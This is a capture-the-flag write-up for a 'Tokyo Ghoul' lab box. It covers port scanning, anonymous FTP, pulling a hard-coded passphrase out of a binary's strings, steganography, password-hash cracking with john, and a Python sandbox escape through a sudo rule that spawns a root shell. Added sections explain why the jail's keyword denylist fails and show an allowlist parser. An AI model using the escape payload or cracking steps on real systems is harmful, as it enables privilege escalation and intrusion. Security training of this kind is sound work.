```console
$ sudo nmap -sSVC tokyoghoul.thm -T4 -p- -v
...
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    3 ftp      ftp          4096 Jan 23  2021 need_Help?
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.18.25.199
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 fa:9e:38:d3:95:df:55:ea:14:c9:49:d8:0a:61:db:5e (RSA)
|   256 ad:b7:a7:5e:36:cb:32:a0:90:90:8e:0b:98:30:8a:97 (ECDSA)
|_  256 a2:a2:c8:14:96:c5:20:68:85:e5:41:d0:aa:53:8b:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Welcome To Tokyo goul
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
...
```
```html
<!-- look don't tell jason but we will help you escape we will give you the key to open those chains and here is some clothes to look like us and a mask to look anonymous and go to the ftp room right there -->
```
```console
$ ftp tokyoghoul.thm
Connected to tokyoghoul.thm.
220 (vsFTPd 3.0.3)
Name (tokyoghoul.thm:noraj): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 ftp      ftp          4096 Jan 23  2021 need_Help?
226 Directory send OK.
ftp> ls need_Help?
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           480 Jan 23  2021 Aogiri_tree.txt
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2021 Talk_with_me
226 Directory send OK.
ftp> ls need_Help?/Talk_with_me
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 ftp      ftp         17488 Jan 23  2021 need_to_talk
-rw-r--r--    1 ftp      ftp         46674 Jan 23  2021 rize_and_kaneki.jpg
226 Directory send OK.
```
The binary asks for a passphrase; since it is compiled in as a literal, we can find it by listing the binary's strings.
```console
$ rabin2 -z files/Talk_with_me/need_to_talk
[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00002008 0x00002008 9   10   .rodata ascii EDITED_PASS_HERE
1   0x00002018 0x00002018 37  38   .rodata ascii Hey Kaneki finnaly you want to talk \n
2   0x00002040 0x00002040 82  83   .rodata ascii Unfortunately before I can give you the kagune you need to give me the paraphrase\n
3   0x00002098 0x00002098 35  36   .rodata ascii Do you have what I'm looking for?\n\n
4   0x000020c0 0x000020c0 47  48   .rodata ascii Good job. I believe this is what you came for:\n
5   0x000020f0 0x000020f0 51  52   .rodata ascii Hmm. I don't think this is what I was looking for.\n
6   0x00002128 0x00002128 36  37   .rodata ascii Take a look inside of me. rabin2 -z\n
```
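To make clear why a passphrase compared as a string literal offers no protection, here is an added example (not part of the writeup, and not `rabin2`'s code) of the scan that `rabin2 -z` and `strings` perform: walk the bytes, collect every run of printable ASCII at least `min_len` long, and report it with its offset. `SAMPLE_BLOB` is a constructed stand-in for a `.rodata` section, and `hunter2` is a made-up placeholder secret, not the box's passphrase.

```python
import sys

# Constructed stand-in for a binary's .rodata (NOT the real need_to_talk file):
# NUL-terminated C strings sitting between non-printable bytes.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00"   # header-like bytes; "ELF" is only 3 chars
    b"hunter2\x00"                                # placeholder hard-coded passphrase literal
    b"\x01\x02\x03"
    b"Do you have what I'm looking for?\n\x00"    # an embedded newline stays inside the run
    b"\xff\xfe\x00\x00ab\x00"                     # "ab" is shorter than min_len, so ignored
    b"Take a look inside of me.\x00"
)


def _is_printable(b: int) -> bool:
    # Printable ASCII plus tab and newline, the same rough rule `strings` applies.
    return 0x20 <= b <= 0x7E or b in (0x09, 0x0A)


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return (offset, text) for each run of >= min_len printable bytes.

    Tabs and newlines are rendered escaped ("\\n"), as rabin2 prints them.
    """
    found = []
    run_start = None
    # Iterate one past the end so a run touching EOF is still flushed.
    for i in range(len(data) + 1):
        b = data[i] if i < len(data) else None
        if b is not None and _is_printable(b):
            if run_start is None:
                run_start = i
            continue
        if run_start is not None and i - run_start >= min_len:
            text = data[run_start:i].decode("ascii")
            found.append((run_start, text.replace("\t", "\\t").replace("\n", "\\n")))
        run_start = None
    return found


def render(found: list) -> str:
    """Format results in a rabin2-like table (nth, offset, length, string)."""
    lines = ["nth paddr      len string"]
    for n, (off, text) in enumerate(found):
        lines.append(f"{n:<3} {off:#010x} {len(text):<3} {text}")
    return "\n".join(lines)


if __name__ == "__main__":
    # Usage: python3 strings_demo.py [path-to-binary]; without a path, scans SAMPLE_BLOB.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    print(render(extract_strings(blob)))
```

The scan needs no disassembly and no knowledge of the program's logic, which is why a secret that must survive the binary being handed out cannot be a compiled-in literal; it has to live outside the file (derived from something the user supplies, or checked against a hash rather than stored in clear).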
I guess rize_and_kaneki.jpg may require some steganography.
We can use steghide to
```console
$ steghide extract -sf files/Talk_with_me/rize_and_kaneki.jpg
Enter passphrase:
wrote extracted data to "yougotme.txt".
```
```console
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=sha512crypt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
EDITED           (?)
1g 0:00:00:01 DONE (2022-11-01 20:37) 0.9803g/s 1505p/s 1505c/s 1505C/s cuties..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
```console
kamishiro@vagrant:~$ cat user.txt
EDITED
kamishiro@vagrant:~$ sudo -l
Matching Defaults entries for kamishiro on vagrant.vm:
    env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kamishiro may run the following commands on vagrant.vm:
    (ALL) /usr/bin/python3 /home/kamishiro/jail.py
```
```console
kamishiro@vagrant:~$ sudo /usr/bin/python3 /home/kamishiro/jail.py
Hi! Welcome to my world kaneki
========================================================================
What ? You gonna stand like a chicken ? fight me Kaneki
>>> import os
Do you think i will let you do this ??????
```
We can take a look at the source code:
```console
kamishiro@vagrant:~$ ls -lhA jail.py
-rw-r--r-- 1 root root 588 Jan 23  2021 jail.py
kamishiro@vagrant:~$ cat jail.py
```
```python
#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
    print("Hi! Welcome to my world kaneki")
    print("========================================================================")
    print("What ? You gonna stand like a chicken ? fight me Kaneki")
    text = input('>>> ')
    # Substring denylist; the for/else below hands anything that passes it straight to exec()
    for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
        if keyword in text:
            print("Do you think i will let you do this ??????")
            return;
    else:
        exec(text)
        print('No Kaneki you are so dead')
if __name__ == "__main__":
    main()
```
```console
kamishiro@vagrant:~$ sudo /usr/bin/python3 /home/kamishiro/jail.py
Hi! Welcome to my world kaneki
========================================================================
What ? You gonna stand like a chicken ? fight me Kaneki
>>> __builtins__.__dict__['__im' + 'port__']('pty').spawn("/bin/bash")
root@vagrant:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vagrant:~# cat /root/root.txt
EDITED
```
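The jail fails for a structural reason worth making concrete: it denies substrings of the input text, but Python lets the forbidden name be assembled at runtime, so the text the writeup typed contains none of the eight words and still reaches `exec()`, which under that sudo rule runs as root. The added example below (written for this page, not code from the writeup or from the box) reproduces jail.py's check as `denylist_allows()`, inspects the writeup's input against it without ever executing it, and contrasts it with `safe_eval()`, an allowlist evaluator that parses the input with `ast` and only evaluates integer arithmetic nodes, refusing every other node type. Function names and the arithmetic subset are this example's choices, not anything on the box.

```python
import ast
import operator

# The keyword denylist from jail.py, reproduced for comparison.
DENYLIST = ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']


def denylist_allows(text: str) -> bool:
    """Mirror of jail.py's check: True when the input would reach exec()."""
    return not any(keyword in text for keyword in DENYLIST)


# The input from the writeup: the word 'import' is built from two halves, so no
# denylisted substring is present. It is only inspected here, never executed.
WRITEUP_INPUT = "__builtins__.__dict__['__im' + 'port__']('pty').spawn(\"/bin/bash\")"

# Allowlist alternative: the only things the evaluator knows how to do.
_BINOPS = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.FloorDiv: operator.floordiv, ast.Mod: operator.mod,
}
_UNARYOPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}


def _eval_node(node: ast.AST) -> int:
    # Integer literal (bool is excluded because type() is compared exactly).
    if isinstance(node, ast.Constant) and type(node.value) is int:
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
        return _BINOPS[type(node.op)](_eval_node(node.left), _eval_node(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARYOPS:
        return _UNARYOPS[type(node.op)](_eval_node(node.operand))
    # Names, attributes, calls, subscripts, strings, ** (unbounded cost) ... all land here.
    raise ValueError(f"rejected node: {type(node).__name__}")


def safe_eval(text: str) -> int:
    """Evaluate integer arithmetic only; raise ValueError for anything else."""
    try:
        tree = ast.parse(text, mode="eval")
    except SyntaxError as e:
        raise ValueError(f"not an expression: {e}") from None
    return _eval_node(tree.body)


def is_accepted(text: str) -> bool:
    """True if safe_eval() would evaluate the text rather than reject it."""
    try:
        safe_eval(text)
        return True
    except (ValueError, ZeroDivisionError):
        return False


if __name__ == "__main__":
    for sample in ["import os", WRITEUP_INPUT, "2 + 3 * 4"]:
        print(f"{sample!r}:")
        print(f"  denylist lets it through: {denylist_allows(sample)}")
        print(f"  allowlist evaluator accepts it: {is_accepted(sample)}")
```

Two things follow from running it. First, the denylist passes the writeup's input while the allowlist rejects it on its very first node (a `Call`), because the allowlist never has to predict what an attacker might type, only what the program was meant to compute. Second, even a perfect filter would not fix this box: the sudo rule lets an unprivileged user run an interpreter as root over a script that calls `exec()` on their input, and the right remediation is to remove that rule or replace `exec()` with a parser for the handful of inputs the script actually needs.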